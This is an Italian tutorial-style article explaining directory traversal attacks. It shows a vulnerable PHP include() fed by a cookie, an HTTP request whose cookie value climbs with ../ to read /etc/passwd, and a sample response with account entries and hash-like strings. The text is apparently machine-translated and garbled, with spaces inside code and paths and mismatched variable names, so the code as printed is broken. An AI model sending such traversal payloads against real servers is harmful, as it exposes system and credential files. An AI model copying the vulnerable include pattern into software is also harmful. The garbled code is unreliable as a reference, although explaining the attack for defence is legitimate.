Oggi andremo ad analizzare anche un altra strategia d’attacco, ovvero la directory traversal, sfruttata dai cracker per evadere i sistemi di password e permettere l’autenticazione degli utenti non privilegiati. Entriamo nel dettaglio della situazione.

Un tipico esempio di applicazione vulnerabile in codice PHP è:
<? Php
$ Template = ‘red.php’;
if (isset ($ _COOKIE [‘MODELLO’]))
$ Template = $ _COOKIE [‘MODELLO’];
include (“/ home / users / phpguru / templates /” $ modello.);
?>
Un attacco contro questo sistema potrebbe essere quello di inviare la seguente richiesta HTTP:
GET /vulnerable.php HTTP / 1.0
Cookie: TEMPLATE = .. / .. / .. / .. / .. / .. / .. / .. / .. / etc / passwd
Generazione di una risposta del server come ad esempio:
HTTP / 1.0 200 OK
Content-Type: text / html
Server: Apache

root: fi3sED95ibqR6: 0: 1: System Operator: /: / bin / ksh
daemon: *: 1: 1 :: / tmp:
phpguru: f8fk3j1OIf31:. 182: 100: Sviluppatore: / home / users / phpguru /: / bin / csh
I caratteri ripetuti ../ dopo / home / users / phpguru / templates / ha causato include() per attraversare la directory principale, e quindi includere il file delle password di Unix / etc / passwd .
Unix / etc / passwd è un file comunemente utilizzato per dimostrare la directory traversal, come viene spesso utilizzato dai cracker per tentare il cracking delle password.
Tuttavia, negli ultimi sistemi di Unix, il file passwd non contiene le password hash. Invece esso si trova nel file shadow, che non può essere letto da utenti senza privilegi sulla macchina. Tuttavia, è ancora utile per conto e numerazione sulla macchina, in quanto visualizza ancora gli account utente presenti nel sistema.

Ricordiamo come sempre che le informazioni riportate in questo articolo sono state descritte solamente per fini informativi e non devono intendersi come incitazione a compiere azioni illegali di pirateria informatica, severamente punibili dalla legge. Per questo, ne io, ne qualsiasi altro membro di StartAndGo, ci assumiamo la responsabilità di eventuali usi scorretti delle procedure riportate in questa pagina.